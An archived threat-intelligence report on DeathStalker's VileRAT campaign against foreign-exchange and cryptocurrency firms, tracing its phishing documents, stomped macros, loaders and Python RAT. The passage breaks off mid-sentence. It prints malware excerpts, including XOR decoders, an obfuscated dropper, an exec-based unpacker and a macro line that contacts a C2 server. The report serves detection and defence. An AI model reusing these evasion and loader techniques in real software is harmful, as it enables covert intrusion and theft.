{
	"id": "0e6aaaaf-a065-4416-af4f-997e33734171",
	"created_at": "2026-04-06T03:35:54.046963Z",
	"updated_at": "2026-04-10T13:12:06.680998Z",
	"deleted_at": null,
	"sha1_hash": "961ec3471b76aebe71c37d7de01be49ce7149179",
	"title": "VileRAT: DeathStalker’s continuous strike at foreign and cryptocurrency exchanges",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 971868,
	"plain_text": "VileRAT: DeathStalker’s continuous strike at foreign and\r\ncryptocurrency exchanges\r\nBy Pierre Delcher\r\nPublished: 2022-08-10 · Archived: 2026-04-06 02:50:53 UTC\r\nIn late August 2020, we published an overview of DeathStalker’s profile and malicious activities, including their Janicab,\r\nEvilnum and PowerSing campaigns (PowerPepper was later documented in 2020). Notably, we exposed why we believe the\r\nthreat actor may fit a group of mercenaries, offering hack-for-hire services, or acting as an information broker to support\r\ncompetitive and financial intelligence efforts.\r\nMeanwhile, in August 2020, we also released a private report on VileRAT to our threat intelligence customers for the first\r\ntime. VileRAT is a Python implant, part of an evasive and highly intricate attack campaign against foreign exchange and\r\ncryptocurrency trading companies. We discovered it in Q2 2020 as part of an update of the Evilnum modus operandi, and\r\nattributed it to DeathStalker. Malicious activities that we associate with DeathStalker’s VileRAT track have been publicly\r\nand partly documented since, without any attribution or under different monikers (Evilnum, PyVil), starting in September\r\n2020, through 2021 and more recently in June 2022.\r\nDeathStalker has indeed continuously leveraged and updated its VileRAT toolchain against the same type of targets since we\r\nfirst identified it in June 2020. While we comprehensively documented the evolution to our threat intelligence customers\r\nrecently, and despite existing public indicators of compromise, we regret to note that the campaign is not only ongoing at the\r\ntime of writing, but also that DeathStalker likely increased its efforts to compromise targets using this toolchain recently. We\r\nhave indeed been able to identify more samples of VileRAT-associated malicious files and new infrastructure since March\r\n2022, which may be a symptom of an increase in compromise attempts. We deemed it may be helpful to publicly expose\r\nsome of our knowledge about VileRAT, to help potential targets better detect and stop such malicious activities.\r\nVileRAT’s initial infection and toolset overview\r\nBack in the summer of 2020, DeathStalker’s VileRAT initial infection consisted in spear-phishing emails sent to foreign\r\nexchange companies, from fake personas (a fake diamonds trading company for instance) who shared investment interests.\r\nShould the target reply and continue with the conversation, the fake persona would at some point and upon request provide a\r\nlink to a malicious file hosted on Google Drive (a Windows shortcut file masquerading as a PDF or in a ZIP archive), as\r\nidentification documents. The malicious link would then trigger the execution of arbitrary system commands, to drop a\r\nharmless decoy document, as well as a malicious and quite sophisticated binary loader that we dubbed VileLoader.\r\nMore recently, since at least late 2021, the infection technique has changed slightly, but the initial infection vector is still a\r\nmalicious message: a Word document (DOCX, see Figure 1) is sent to targets via email (either as an attachment or\r\nembedded in the email body whenever possible). In July 2022, we also noticed that the attackers leveraged chatbots that are\r\nembedded in targeted companies’ public websites to send malicious DOCX to their targets.\r\nFigure 1. Malicious DOCX social engineering message\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 1 of 23\n\nThe DOCX documents are frequently named using the “compliance” or “complaint” keywords (as well as the name of the\ntargeted company), suggesting the attacker is answering an identification request or expressing an issue as a reason to send\nthem.\nThe initial infection and toolset deployment, as we observed them starting in at least late 2021, are schematized below (see\nFigure 2).\nFigure 2. VileRAT infection and toolset overview\nA bit of stomping and concealment up to VileDropper\nThe initial DOCX infection document itself is innocuous, but it contains a link to another malicious and macro-enabled\nDOTM document as a “remote template” (see Figure 3). These DOTM files are automatically downloaded by Word when\nthe DOCX is opened, and its embedded macro is triggered if the recipient enabled execution (as requested by the social\nengineering message, see Figure 1).\n1\n2\n3\n4\n?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?\u003e\nFigure 3. Malicious remote template inclusion in infection DOCX\nThe malicious DOTM remote templates leverage the VBA stomping technique to conceal the code of an embedded macro.\nVBA stomping involves making the editable VBA source code (i.e., the visible code of a macro) different from the code that\nwill actually be executed. This is possible because both the editable (visible) source code and a transformed internal version\nof it called p-code are embedded in macro-enabled documents. As a result of VBA stomping, the real macro code that will\nbe executed is hidden from standard tools (Microsoft Word’s macro edition tools, but also OLETools).\nThis technique comes with a drastic limitation: the hidden macro (i.e., internal p-code) can only be executed if the macro-enabled document is opened with the same Office version from which it was generated. Otherwise, the hidden macro cannot\nrun, and the visible one will be executed instead. In this last case, DeathStalker ensured it would result in a popup message\nto the user (see Figure 4). But most of all, DeathStalker ensured that it distributed several variants of infection documents to\ntheir targets, each one being prepared for a specific Office version.\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\nPage 2 of 23\n\nFigure 4. VBA stomping failure in a malicious DOTM remote template\r\nIn any case, the visible and hidden macros download a picture to replace the social engineering message in the infection\r\ndocument (see Figure 5) and trick the readers into believing something failed.\r\nFigure 5. Example of a downloaded image upon macro execution\r\nIn the background, however, provided the VBA stomping worked, the DOTM-embedded macro silently gathers information\r\nabout security products that are installed on the target computer (using WMI), sends them to a command-and-control (C2)\r\nserver, decodes and drops files, then ultimately executes a malicious obfuscated JavaScript (JS) backdoor we called\r\nVileDropper.\r\nThe DOTM-embedded macro itself already reveals some interesting and specific techniques. It is lightly obfuscated, as most\r\ntext strings are XOR-encoded (see Figure 6) with a password that is derived from a sentence (e.g., “Operates Catholic small\r\ntowns pueblos Two of“).\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\nFunction decodestring(dt As String) As String\r\n    On Error Resume Next\r\n    Dim ks As String\r\n    ks = decodepassword\r\n    Dim dl As Long\r\n    dl = ((Len(dt) / 2) - 1)\r\n    kl = Len(ks)\r\n    Dim s As String\r\n    s = \"\"\r\n    For i = 0 To dl\r\n        Dim c1 As Integer\r\n        Dim c2 As Integer\r\n        c1 = Val(\"\u0026H\" \u0026 Mid(dt, ((i * 2) + 1), 2))\r\n        c2 = Asc(Mid(ks, (i Mod kl) + 1, 1))\r\n        s = s \u0026 Chr(c1 Xor c2)\r\n    Next\r\n    decodestring = s\r\nEnd Function\r\nFigure 6. XOR decoding function (renamed for clarity) in DOTM-embedded macro\r\nThe XOR decoding algorithm looks very close to the one that has been leveraged in VBS loader scripts from the\r\nPowerPepper toolchain (see Figure 7) in the past, and seemingly legitimate function names are also reminiscent of those that\r\nwere used by PowerPepper macros (e.g., “insert_table_of_figures”, “change_highlight_color”, etc.).\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 3 of 23\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\nFunction DelPort(GeneralText)\r\n    Dim Argv : Argv = WScript.Arguments(0)\r\n    GeneralText = Replace(GeneralText, \"44f\",\"44\")\r\n    Dim z, i, cvpo, vpcol, sdfiko, gfdvvc, sdfopk\r\n    For i = 1 To Len(GeneralText)\r\n        cvpo = cvpo + 1\r\n        If cvpo \u003e Len(Argv) Then cvpo = 1\r\n        gfdvvc = Asc(Mid(Argv, cvpo, 1))\r\n        If i \u003e Len(GeneralText) \\ 2 Then Exit For\r\n        vpcol = CByte(\"\u0026H\" \u0026 Mid(GeneralText, i * 2 - 1, 2))\r\n        sdfiko = vpcol Xor gfdvvc\r\n        z = z \u0026 Chr(sdfiko)\r\n    Next\r\n    DelPort = z\r\nEnd Function\r\nFigure 7. XOR decoding function in a PowerPepper VBS loader (MD5 DB6D1F6AB887383782E4E3D6E4AACDD0)\r\nThe DOTM-embedded macro decodes and drops two files (in the “%APPDATA%” folder: “Redist.txt” and\r\n“ThirdPartyNotice.txt”, or “pattern.txt” and “changelog.txt”) out of encoded data that is stored in non-visible TextBox forms\r\n(see Figure 8). Leveraging Office object properties as hidden data sources is also something we have previously seen with\r\nPowerPepper.\r\nFigure 8. TextBox form used as a data store within malicious DOTM documents, as shown by Microsoft’s VBA editor\r\nAnother notable feature is that the DOTM-embedded macro signals progression or errors during the execution by sending\r\nHTTP GET requests to fixed C2 URLs. Interestingly, all HTTP requests in the VBA macro are triggered using remote\r\npicture insertion functions (see Figure 9).\r\n1\r\n2\r\n3\r\ndoc.Shapes.AddPicture\r\n(decodestring(\"09184015545D5B1B1B07501E001F5C4B0D1D5B3B2D3647143422115728383E1D3E2A024B06025B...0F1C02301C4B57743F\r\n' hxxp://hubflash[.]co/HCSqfUN%2FJJnPO49gnojrpDo%2BMxnGrYaL161m49AhAAAA%2FwQ5Tgt6JlNO\r\npWd1chDdUc5MB1HWBB9Yq3EECIbTO8uX\r\nFigure 9. DOTM-embedded macro leverages “AddPicture” as a Web client\r\nIn any case, the DOTM-embedded macro finally triggers VileDropper’s execution, using a renamed copy of the “WScript”\r\ninterpreter (“msdcat.exe” or “msgmft.exe” in the “%APPDATA%” folder), with a command such as:\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 4 of 23\n\n1 msgmft.exe /E:jScrIpt \"\\changelog.txt\" 91 pattern.txt\r\n“changelog.txt” is VileDropper, while “91” is part of password used by VileDropper to decode XORed data, and\r\n“pattern.txt” is an encoded package that contains VileLoader.\r\nVileDropper: an overly obfuscated task scheduler\r\nNext in DeathStalker’s intricate VileRAT infection chain comes VileDropper. It is an obfuscated JavaScript file that mainly\r\ndrops and schedules the execution of the next stage: VileLoader.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\nvar _0x140c9e;//ACCS3\r\n_0x36bbe9: {//ACCS3\r\n    try {//ACCS3\r\n        var _0x527036 = _0x112a30 + '\\x5c' + WScript[_0x1dbcbb(0x38c)](0x1),//ACCS3\r\n            _0x33ee6e = _0x3b3918[_0x4462ad[_0x1dbcbb(0x312)](_0x4459df, _0x4462ad[_0x1dbcbb(0x23d)])]\r\n(_0x527036, 0x1),//ACCS3\r\n            _0x46efdf = _0x33ee6e[_0x4459df(_0x1dbcbb(0x1e7) + _0x1dbcbb(0x29c))]();//ACCS3\r\n        _0x33ee6e[_0x1dbcbb(0x37a)](), _0x3b3918[_0x1dbcbb(0x38f)](_0x527036), _0x527036 = '';//ACCS3\r\n        for (_0x33ee6e = 0x0; _0x33ee6e \u003c _0x46efdf[_0x1dbcbb(0x2fa)] - 0x2; _0x33ee6e += 0x2)//ACCS3\r\n            _0x527036 += String[_0x1dbcbb(0x259) + 'de'](parseInt(_0x46efdf[_0x1dbcbb(0x2f4)](_0x33ee6e,\r\n_0x33ee6e + 0x2), 0x10));//ACCS3\r\n        _0x140c9e = _0x527036;//ACCS3\r\n        break _0x36bbe9;//ACCS3\r\n    } catch (_0x48c9c6) {}//ACCS3\r\n    _0x140c9e = void 0x0;//ACCS3\r\n}//ACCS3\r\nFigure 10. VileDropper code excerpt in its original form\r\nVileDropper needs at least two arguments to run for the first time (a third may be used as a flag to trigger environment-specific execution variations, depending on security products that are installed on targeted computers):\r\nthe first one is a partial password (used to decode XOR-encoded data),\r\nthe second is a path to an encoded payload file (contains VileLoader and its companion shellcode).\r\nVileDropper also checks its interpreter and file name, to immediately stop execution if it is not called as planned (this is\r\nprobably done to evade sandboxes), as can be seen in the following deobfuscated code excerpt:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\nif (aWShell1[\"CurrentDirectory\"][\"toLowerCase\"]() != aAppDataPath1[\"toLowerCase\"]()) {\r\n    WScript[\"Quit\"]();\r\n}\r\nif (!sArgThird1) {\r\n    if (-0x1 == aScriptHostFullpath1[\"indexOf\"](\"msdcat\")) {\r\n        WScript[\"Quit\"]();\r\n    }\r\n} else {\r\n    if (-0x1 == aScriptHostFullpath1[\"indexOf\"](\"cscript\")) {\r\n        WScript[\"Quit\"]();\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 5 of 23\n\n11\n12\n }\n}\nFigure 11. Deobfuscated execution check in VileDropper\nVileDropper’s exact execution flow depends on the security products that are installed on the targeted computer, but most of\nthe time, it copies itself to another file, relaunches itself, and deletes its original copy. During execution VileDropper:\ngathers additional data on the targeted environment (using WMI) as well as generating a target identifier and sends\nthem to a C2 server;\ndecodes and drops VileLoader and its encoded companion shellcode. The file names and location will vary depending\non samples, but they are placed under a seemingly legitimate common folder in “%APPDATA%” (e.g., “exe” and\n“dev0Y11ZF.tmp” in “%APPDATA%\\Microsoft\\Printer Settings\\Printers\\”);\nschedules a task to run VileLoader 35 to 65 seconds later, then indefinitely every three hours and 45 minutes.\nVileDropper sends data to a C2 server using an HTTP GET request to a fixed URL (e.g.,\n“hxxp://hubflash[.]co/admin/auth.php”), using a preset User-Agent (both the C2 URL and the User-Agent change depending\non VileDropper samples). The useful information is stored as a JSON document, which is then XOR-encoded, base64-\nencoded, URL-encoded, and set as a cookie value in the HTTP request:\nJSON\nKey\nContent (JSON value)\nu\nA target identifier. The identifier is a custom UUID-like representation of the target’s login (%USERNAME%\nenvironment variable) and computer UUID (as obtained in the first result of the WMI query: SELECT UUID\nFROM Win32_ComputerSystemProduct). This UUID-like value is then base64-encoded and URL-encoded.\nDue to fixed lengths and padding from the identifier generation logic, the identifier’s final form is always 48\ncharacters long.\nd A hard-coded VileDropper identifier, which might designate a campaign or version (e.g., “9745B355”).\na\nA list of the names of the security products (AntiVirusProduct in WMI) that are installed on the target\ncomputer, separated by the pipe sign (|), then XORed, base64-encoded and URL-encoded.\nn\nThe target’s fully qualified login, as the shell expansion of “%USERDOMAIN%\\%USERNAME%”, which\nis then XORed, base64-encoded and URL-encoded.\nw\nThe target’s operating system version, as returned from the WMI query SELECT Version FROM\nWin32_OperatingSystem, then base64-encoded and URL-encoded.\nThe task that is scheduled by VileDropper (whose name varies depending on samples, e.g., “CDS Sync” or “UpdateModel\nTask”), triggers the following type of execution command:\n1\n%APPDATA%\\Microsoft\\Printer Settings\\Printers\\FWDeviceEnabler.exe \"[u]\" \"\" \"[a]\" \"[w]\" 0 \"[d]\" \"[n]\" The characters between square brackets (such as [u]) in the command line designate the content of the corresponding JSON\nkey (i.e., [u] is the encoded target identifier).\nA XORing interlude\nBefore moving on to VileLoader, a note on the XOR encoding scheme that is leveraged by VileDropper to protect data sent\nto the C2 server, as similar schemes will be used further on. The algorithm generates data blobs that are laid out as follows\n(then sometimes further base64-encoded and URL-encoded):\nType A:\n1 [XOR key (6 random bytes)][XOR-encoded data]\nThe resulting blobs are self-sufficient and can be decoded by the recipient (as well as any third party…) without any access\nto the pre-shared key. In VileDropper, strings that are encoded as part of the JavaScript obfuscation benefit from an\nadditional XORing step: the XOR key that is embedded in data blobs is additionally XORed with a script-specific fixed\npassword (a part of this fixed password is passed to VileDropper on its execution command line by the previous DOTM\nmacro in the infection chain, the other part is hard-coded in VileDropper itself).\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\nPage 6 of 23\n\nLater, VileLoader and VileRAT use other variants of this algorithm, which produces data blobs that are laid out as one of the\r\nfollowing options:\r\nType B:\r\n1 [XOR key length (variable)][XOR key (random bytes)][Padding][XOR-encoded data]\r\nType C:\r\n1 [XOR-encoded data length][XOR-encoded data][XOR key length (variable)][XOR key (random bytes)]\r\nType D:\r\n1 [XOR key length (variable)][XOR key (random bytes)][XOR-encoded data length][XOR-encoded data]\r\nVileLoader: an evasive multi-stage implant downloader\r\nVileLoader is a remarkable piece of the VileRAT compromise approach. While it has existed since Q2 2020 (it was first\r\npublicly documented as dddp.exe), it has been continuously updated and maintained since, and is still deployed from\r\nVileDropper at the time of writing. VileLoader’s main goal is to download and execute an additional payload from a C2\r\nserver. Though we have only observed it triggering the execution of VileRAT, the loader can technically download and\r\nexecute other implants.\r\nRecent VileLoader samples are composed of a binary executable (stage 1) and an encoded companion shellcode file (stage\r\n2). Previous samples of VileLoader usually embedded the shellcode within the binary executable directly, and presented\r\nthemselves as a single monolithic file.\r\nStage 1 – Doctored binary unpacker\r\nVileLoader is initially presented as a binary executable, which ensures the first stage of the execution. This binary is always\r\na legitimate one, which is meticulously doctored by the attackers to integrate a malicious unpacker-type payload. As such,\r\nthe binary may appear legitimate from a quick automated static code analysis perspective: it includes all the code of a\r\nlegitimate application (but will not work as expected). This “unpacker” stage is aimed at decoding, loading, and executing\r\nthe second stage in memory.\r\nVileLoader’s workflow starts by waiting 17 seconds. Then it parses the command line arguments. The command line must\r\ninclude five arguments at least, or VileLoader terminates the execution. In practice, VileDropper usually gives seven\r\narguments to VileLoader, as we have previously described. VileLoader then opens its encoded companion shellcode file\r\n(whose name is passed as a second argument to VileLoader, e.g., “devENX1C6SS.tmp”), reads and decodes it (using the\r\nType B XOR algorithm), maps the deobfuscated data in a region with read, write and execute (RWX) permissions, and runs\r\nthe next stage (stage 2) by starting a new thread.\r\nVileLoader’s first stage contains very unique “signature” techniques that have been stable since the first sample we analyzed\r\nin Q2 2020:\r\n“Sleep” and “GetTickCount” Windows API functions are leveraged to generate random waiting delays. Those\r\nfunctions are resolved in an unusual way: by referencing hard-coded offsets from the beginning of the current binary\r\nimage that point directly to entries in the legitimate executable’s import address table (IAT);\r\nthe unpacking and loading of VileLoader’s encoded companion shellcode file leverages multiple custom-made\r\nsystem calls, that are similar to low-level Windows API functions (NTDLL) for different Windows versions:\r\nNtOpenFile, NtReadFile, NtAllocateVirtualMemory, NtCreateThreadEx and NtWaitForSingleObject (see Figure 12).\r\nFigure 12. VileLoader’s stage 1 custom-made system call\r\nHowever, while older samples parsed command line arguments by resolving and calling dedicated Windows API functions\r\n(such as “GetCommandLineW”), the recent samples directly read this information from their own PEB (Process\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 7 of 23\n\nEnvironment Block) structure. This may have been done to better bypass the detection of some security solutions.\r\nStage 2 – In-memory downloader\r\nThe second stage content is extracted from VileLoader’s encoded companion shellcode file, and run by VileLoader’s first\r\nstage in-memory, in a new thread. From a data perspective, the second stage shellcode (once unpacked by the first stage) is a\r\nPE binary that is stripped of its headers and embeds additional encoded data.\r\nThis second stage starts by decoding the required data from its own content (using the Type C XOR algorithm). Some data\r\nare decoded as hash values that were generated with the djb2 algorithm. Those hashes are in turn used to resolve the\r\nrequired function imports through a homebrew IAT: required libraries are loaded, their export tables are parsed, exported\r\nfunction names are hashed with djb2, and the hashes are compared to hashes that were decoded from internal data. Stage 2\r\ncontinues by creating a mutex, whose name has been stable since Q2 2020, and which is the same as in VileRAT\r\n(“Global\\wU3aqu1t2y8uN”).\r\nFinally, VileLoader’s second stage builds an HTTP GET request that is used to download an implant package. In older\r\nVileLoader samples, the downloader used a static URL that looked as follows:\r\n1 http://\u003cdomain\u003e/c\u0026v=2\u0026u=\u003cargument 1\u003e\u0026a=\u003cargument 2\u003e\u0026c=\u003cargument 3\u003e\r\nThe only evasion attempt consisted in randomly choosing an HTTP User-Agent header value amongst a fixed list of four.\r\nVileLoader used the targeted system’s uptime as a source of “randomness”. In recent samples, developers tried to improve\r\nthese evasion techniques, and the HTTP request now looks like this:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\nGET /administrator/index.php HTTP/1.1\r\nConnection: keep-Alive\r\nAccept-Language: en-US,en;q=0.8\r\nAccept: */*\r\nReferer: http://www.yahoo.com\r\nCookie: source=\u003cencrypted blob\u003e;\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/92.0.4515.131 Safari/537.36\r\nHost: corstand[.]com\r\nAll values that are colored in red are now chosen at random from a hard-coded list that is decoded from the stage 2 content\r\n(using the Type C XOR algorithm). The encrypted blob (cookie value) is initially a JSON dictionary, encrypted with the\r\nRC4 algorithm (using the key “BD DE 96 D2 9C 68 EE 06 49 64 D1 E5 8A 86 05 12 B0 9A 50 00 4E F2 E4 92 5C 76 AB\r\nFC 90 23 DF C6”, decoded from stage 2 content), XORed (using the Type B XOR algorithm), base64-encoded and URL-encoded. The actual JSON content is very similar to the one that is sent by VileDropper to the C2 server:\r\nJSON\r\nKey\r\nProvided by VileDropper  via the\r\ncommand line\r\nValue\r\nv\r\nHard-coded value (65 in the last sample we analyzed) which might\r\nbe a version number.\r\nu ✔️ The target identifier.\r\na ✔️ The list of security solutions installed on the targeted computer.\r\nw ✔️ The target’s operating system version.\r\nd ✔️ A fixed identifier, which might designate a campaign or version.\r\nn ✔️\r\nThe target’s fully qualified login\r\n(%USERDOMAIN%\\%USERNAME%).\r\nr Flag that indicates if the mutex creation succeeded (1) or failed (0).\r\nxn Current process name (e.g., SerenadeDACplApp.exe).\r\ns Constant value embedded in the code and equal to 0.\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 8 of 23\n\nThe C2 server then answers in the HTTP response body, with one of the following instructions:\r\ndo nothing: the answer is four null bytes;\r\nimplant package: the answer is an encoded implant package to parse (see later);\r\nsend a screenshot: the answer is a byte of value “1”, followed by three null bytes.\r\nIn older variants, VileLoader’s second stage did not embed the screenshot capability, which was, however, implemented in\r\nVileRAT.\r\nIf the C2 server answers with an implant package, it sends a Type D XORed blob. The resulting data is further\r\ndecompressed using the LZMA1 algorithm, and contains one or several “files” with the following additional metadata:\r\nA CSIDL value, representing the root folder in which the file must be dropped (resolved with the\r\n“SHGetFolderPathW” Windows API function);\r\nA subdirectory name;\r\nA file name;\r\nA task name if the file execution is to be scheduled;\r\nThe command-line arguments if the file is to be executed.\r\nIf a specific flag is set in the C2 server response data, VileLoader creates a Windows scheduled task for the last dropped file\r\nto set up its persistence. The task is created using the ITaskService interface. Finally, the last dropped file is also\r\nimmediately executed using the “CreateProcessW” Windows API function. It should be noted that some older VileLoader\r\nsamples executed the downloaded payload in memory, while recent variants tend to drop the downloaded implant on the\r\ntarget’s filesystem.\r\nIf the C2 server requests a screenshot, then VileLoader stage 2 sends an HTTP POST request with a cookie whose value is a\r\nXORed (Type B algorithm) JSON dictionary containing the following fields:\r\nJSON Key Value\r\nu Target identifier.\r\nsc Constant value (1).\r\ndt Screenshot timestamp (in the format “YYYY-MM-DD HH:MM:SS”).\r\nThe associated HTTP POST body data is an encoded (using the Type B XOR algorithm) JPEG screenshot.\r\nVileRAT – A super-packed yet still overweight Python implant\r\nVileRAT is the last known stage of the intricate eponym infection chain from DeathStalker. It is an obfuscated and packed\r\nPython3 RAT, bundled as a standalone binary with py2exe. We first discovered it in Q2 2020, and it has also subsequently\r\nbeen named PyVil by other vendors.\r\nA note on VileRAT’s seniority\r\nThe Python library (DLL) that is embedded in a py2exe-bundled binary usually comes from an official Python release.\r\nWhile analyzing VileRAT samples, we noticed that its Python DLL is a custom compilation of Python 3.7 sources: the DLL\r\nversion is tagged as “heads/3.7-dirty”[1] (instead of “tags/v3.7.4” for an official release, for instance) and references a\r\nshortened Git commit ID of “0af9bef61a”. This shortened commit ID matches one in the source code repository of the 3.7\r\nbranch of the standard CPython implementation, which is dated to 2020-05-23. Due to this commit date and considering the\r\nfact that we first discovered VileRAT in Q2 2020, we believe with medium to high confidence that VileRAT was first\r\npackaged for deployment in June 2020.\r\nUnpacking VileRAT\r\nWhen we first encountered VileRAT, we noticed that all usual decompiling tools for Python3 (uncompyle6, decompyle3 and\r\nunpyc37, to name just a few) failed to correctly retrieve a Python source from the VileRAT bytecode. Some of our industry\r\npeers had the same issue when they encountered it as PyVil.\r\nLong story short: the first stage of VileRAT has been obfuscated at the Python bytecode-level, with the intention of breaking\r\nexisting decompilers (see Figure 13). The bytecode is obfuscated by:\r\nadding multiple operations that do not have any effect when executed (neutral operations) and useless data;\r\nadding confusing branching and exceptions handlers;\r\ninserting invalid bytecode in sections that will never be reached during execution (but that decompilers still try – and\r\nfail – to decompile).\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 9 of 23\n\nFigure 13. VileRAT’s first stage Python bytecode, in its original form (left) and deobfuscated form (right). The only\nuseful instructions of this excerpt are highlighted in red.\nOnce cleaned at bytecode-level, the first stage of VileRAT unpacking can be properly decompiled as Python code:\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n11\n12\n13\n14\n15\n16\n17\n18\n19\n20\nimport sys\nimport zlib\nimport base64\nT8 = base64.b64decode\ny6 = zlib.decompress\nm5 = T8(b'')\nk9 = bytearray(m5)\nY7 = bytearray(b'0sMIsDYmkeST5ZJHOfHkwmrA5JGVmpBbpKeA')\nN2 = bytearray(len(k9)*bytes([0]))\nj = 0\ncode_length = int(len(k9)/5)\nfor i in range(code_length):\n if i % 3 == 0:\n N2[i] = k9[i] ^ Y7[j]\n N2[i] = k9[i]\n if j + 1 == len(Y7):\n j = 0\n j += 1\nN2[i:] = k9[i:]\nexec(y6(N2))\nVileRAT embeds no less than three layers of unpacking. The efforts that have been put into making a Python script\n(VileRAT) hard to analyze from a human perspective is a DeathStalker signature by itself, considering they also tried the\nsame for all the other steps in the infection chain, and that it is part of their usual approach.\nThe last unpacking step finally extracts the VileRAT Python code and a whole bundle of its dependencies in memory – all\nthis content causes py2exe-bundled VileRAT samples to weigh around 12MB. The unpacking leverages decoding (using the\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\nPage 10 of 23\n\nType B XOR algorithm) and BZIP2 decompression. The final VileRAT Python package notably contains a conf.pyc module\r\nwhich includes a version number, as well as default C2 domain names:\r\n1\r\n2\r\n3\r\n4\r\nVERSION = 7.2\r\nSVC_NAME = 'AJRouter'\r\nserver_urls = ['hxxp://pngdoma[.]com', 'hxxp://robmkg[.]com', 'hxxp://textmaticz[.]com', 'hxxp://goalrom[.]com']\r\nuser_agent_list = ['Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/93.0.4577.63 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n(KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36', 'Mozilla/5.0 (Windows NT\r\n10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36']\r\nVileRAT versions and functionalities\r\nWe analyzed and compared various VileRAT samples, containing version numbers ranging from 2.4 to 8. VileRAT\r\nfunctionalities have not changed much over time, and some functionalities from the earliest sample we analyzed have\r\nactually been dropped (such as leveraging SSH as a C2 channel, or screenshotting, the latter now being implemented in\r\nVileLoader instead). The remaining functionalities include:\r\nArbitrary remote command execution, using an existing or downloaded binary;\r\nEstablishing SSH connections to remote servers, possibly leveraging them to forward ports of the targeted computer\r\nto the remote server;\r\nKeylogging;\r\nSetting up persistence using scheduled tasks;\r\nListing security solutions that are installed on the target computer;\r\nSelf-updating from a C2 server.\r\nVileRAT has five distinct and exclusive execution modes, enabled from the command line, which can all be further altered\r\nwith additional command switches, parameters and/or data from the C2:\r\nCommand\r\nline option\r\nInternal name(s) Execution mode description\r\n-a\r\nenc_cmd_data\r\nRUN_CMD_AS_USER_ARG\r\nArbitrary command execution\r\nThe “command” term is quite large: it can either be an existing binary,\r\na shell command, a downloaded executable, a Python package, or an\r\ninternal VileRAT function. In order to specify the “command”, a\r\nJSON dictionary[2] is passed as an optional parameter. Some\r\ncommands will be executed by starting VileRAT again, using a\r\ndistinct set of command options. VileRAT exits after this execution.\r\n-l\r\nenc_cmd_data_rss\r\nRUN_R_SSH_SHELL_ARG\r\nSSH connection test\r\nVileRAT starts a new process of itself, which connects to a remote\r\nSSH server (using a private key), then… closes the connection. This\r\nSSH connection used to serve as a C2 channel in previous samples,\r\nbut the C2 logic has been removed in recent samples. In order to\r\nspecify the SSH connection settings, a JSON dictionary is passed as\r\nan optional parameter. VileRAT exits after this execution.\r\n-r\r\nenc_cmd_data_rds\r\nRUN_R_DYN_SSH_ARG\r\nSSH-tunneled local port forward\r\nVileRAT starts a new process of itself, which connects to a remote\r\nSSH server (using a password). This connection is leveraged as a\r\ntunnel to forward ports from the target computer to the remote server.\r\nIn order to specify the SSH connection settings, a JSON dictionary is\r\npassed as an optional parameter. VileRAT quits once the remote end\r\nhas connected to the forwarded port at least once, and subsequently\r\nclosed the connection.\r\n-c cp_exe_path Arbitrary file deletion\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 11 of 23\n\nVileRAT attempts to delete a file, whose path is given as a clear text\r\ncommand parameter. VileRAT quits when the file is deleted or when\r\nthe maximum number of attempts (10) is reached.\r\n-t\r\nrts\r\nIS_TASK_SCHED_ARG\r\nMain C2 client mode\r\nThis is the main execution mode for VileRAT. It regularly polls a C2\r\nserver for commands to execute. The commands that can be executed\r\nare one of those described in this table (RUN_R_SSH_SHELL_ARG,\r\nRUN_CMD_AS_USER_ARG, RUN_R_DYN_SSH_ARG), or one of\r\nthe additional VileRAT internal update commands.\r\nCMD_UPDATE_SVC triggers a (partial or complete) VileRAT update\r\nfrom a C2-downloaded package, while CMD_UPDATE_CONF can\r\nupdate internal delays and enable a keylogger if the C2 requires so.\r\nIn a typical first execution for VileRAT, as we identified in 2022, the implant is started with the following arguments:\r\n1 ImagesInfo.exe \"[u]\" -x -m \"EDP CredsTask\" -i\r\nNote than in this case, the target identifier that is passed as the first argument is not actually exploited by VileRAT, and may\r\njust be used by the attacker to easily identify running VileRAT processes later. Older VileRAT variants were usually\r\nlaunched with explicit “-f” and “-t” command line switches: those are now implicit and enabled by default.\r\nHere is the list of some notable VileRAT changes we spotted as the versions evolved, apart from regular updates to fix code\r\nbugs or handle uncaught exceptions, refactor code, update dependencies, and change configuration:\r\nBetween 